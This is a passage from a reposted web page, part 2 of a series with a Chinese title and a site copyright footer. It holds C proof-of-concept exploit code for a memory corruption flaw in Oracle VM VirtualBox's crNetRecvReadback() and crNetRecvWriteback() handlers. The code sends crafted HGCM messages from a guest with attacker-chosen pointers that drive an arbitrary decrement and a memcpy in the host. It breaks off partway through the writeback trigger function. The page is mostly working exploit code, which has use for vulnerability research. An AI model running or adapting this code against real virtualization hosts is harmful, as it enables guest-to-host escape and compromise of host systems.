Oracle VM VirtualBox 'crNetRecvReadback()'函数内存破坏漏(2)

parms.vMajor.type      = VMMDevHGCMParmType_32bit;
    parms.vMajor.u.value32 = CR_PROTOCOL_VERSION_MAJOR;
    parms.vMinor.type      = VMMDevHGCMParmType_32bit;
    parms.vMinor.u.value32 = CR_PROTOCOL_VERSION_MINOR;

rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CALL, &parms,
sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);

if (!rc){
        printf("ERROR: DeviceIoControl failed in function set_version()!
LastError: %d\n", GetLastError());
        exit(EXIT_FAILURE);
    }

if (parms.hdr.result == VINF_SUCCESS){
        printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
    }
    else{
        printf("Host didn't accept our version.\n");
        exit(EXIT_FAILURE);
    }
}


void set_pid(HANDLE hDevice, uint32_t u32ClientID){
    CRVBOXHGCMSETPID parms;
    DWORD cbReturned = 0;
    BOOL rc;

memset(&parms, 0, sizeof(parms));
    parms.hdr.result      = VERR_WRONG_ORDER;
    parms.hdr.u32ClientID = u32ClientID;
    parms.hdr.u32Function = SHCRGL_GUEST_FN_SET_PID;
    parms.hdr.cParms      = SHCRGL_CPARMS_SET_PID;

parms.u64PID.type    = VMMDevHGCMParmType_64bit;
    parms.u64PID.u.value64 = GetCurrentProcessId();

rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CALL, &parms,
sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);

if (!rc){
        printf("ERROR: DeviceIoControl failed in function set_pid()!
LastError: %d\n", GetLastError());
        exit(EXIT_FAILURE);
    }

if (parms.hdr.result == VINF_SUCCESS){
        printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
    }
    else{
        printf("Host didn't like our PID %d\n", GetCurrentProcessId());
        exit(EXIT_FAILURE);
    }

}


/* Triggers the vulnerability in the crNetRecvReadback function. */
void trigger_message_readback(HANDLE hDevice, uint32_t u32ClientID){
    CRVBOXHGCMINJECT parms;
    DWORD cbReturned = 0;
    BOOL rc;
    char mybuf[1024];
    CRMessageReadback msg;

memset(&msg, 0, sizeof(msg));
    msg.header.type = CR_MESSAGE_READBACK;
    msg.header.conn_id = 0x8899;


    //This address will be decremented by 1
    *((DWORD *)&msg.writeback_ptr.ptrSize) = 0x88888888;
    //Destination address for the memcpy
    *((DWORD *)&msg.readback_ptr.ptrSize) = 0x99999999;

memcpy(&mybuf, &msg, sizeof(msg));
    strcpy(mybuf + sizeof(msg), "Hi hypervisor!");

memset(&parms, 0, sizeof(parms));
    parms.hdr.result      = VERR_WRONG_ORDER;
    parms.hdr.u32ClientID = u32ClientID;
    parms.hdr.u32Function = SHCRGL_GUEST_FN_INJECT;
    parms.hdr.cParms      = SHCRGL_CPARMS_INJECT;

parms.u32ClientID.type      = VMMDevHGCMParmType_32bit;
    parms.u32ClientID.u.value32  = u32ClientID;

parms.pBuffer.type                  = VMMDevHGCMParmType_LinAddr_In;
    parms.pBuffer.u.Pointer.size        = sizeof(mybuf); //size for the
memcpy: sizeof(mybuf) - 0x18
    parms.pBuffer.u.Pointer.u.linearAddr = (uintptr_t) mybuf;

rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CALL, &parms,
sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);

if (!rc){
        printf("ERROR: DeviceIoControl failed in function
trigger_message_readback()!. LastError: %d\n", GetLastError());
        exit(EXIT_FAILURE);
    }

if (parms.hdr.result == VINF_SUCCESS){
        printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
    }
    else{
        printf("HGCM Call failed. Result: %d\n", parms.hdr.result);
        exit(EXIT_FAILURE);
    }
}


/* Triggers the vulnerability in the crNetRecvWriteback function. */
void trigger_message_writeback(HANDLE hDevice, uint32_t u32ClientID){
    CRVBOXHGCMINJECT parms;
    DWORD cbReturned = 0;
    BOOL rc;
    char mybuf[512];
    CRMessage msg;

memset(&mybuf, 0, sizeof(mybuf));

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/ec394ef1cc510d8b5942150248c95b92.html